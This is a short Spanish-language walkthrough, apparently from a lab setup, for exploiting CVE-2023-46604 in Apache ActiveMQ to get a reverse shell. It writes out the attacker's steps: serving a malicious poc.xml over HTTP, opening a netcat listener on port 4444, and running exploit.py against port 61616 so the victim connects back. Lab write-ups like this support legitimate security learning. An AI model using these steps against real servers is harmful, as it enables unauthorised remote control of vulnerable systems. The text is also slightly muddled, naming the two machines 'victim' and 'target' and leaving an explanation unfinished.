
Exploit PoC para CVE-2023-46604 dirigido a Apache ActiveMQ, que entrega una carga útil XML a través de HTTP para establecer una shell inversa en el servicio vulnerable.
CVE-2023-46604

Construir docker-compose que contenga 2 imágenes: la máquina víctima y la máquina objetivo según el entorno requerido. En la máquina víctima, iniciar ActiveMQ.
Cambiar a la máquina atacante: • Iniciar un servicio HTTP para enviar el PoC: python3 -m http.server
• Usar netcat para escuchar conexiones entrantes a la máquina atacante: nc -nlvp 4444
• Enviar el payload para crear una conexión reverse shell hacia la máquina atacante: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Donde:
Se puede observar que, después de ejecutar el comando para ejecutar el archivo 'exploit.py', el código de explotación envía un paquete 'poc.xml' desde el servidor web hacia el objetivo, que es la dirección del servicio ActiveMQ que se está ejecutando en el servidor objetivo. Al mismo tiempo, el servidor web HTTP en la máquina atacante también recibe una solicitud enviada desde la dirección IP de la máquina objetivo.
Después de enviar el payload, cambie al terminal que está escuchando en el puerto 4444 de la máquina atacante. Veremos que la reverse shell de la máquina víctima ha sido enviada de vuelta.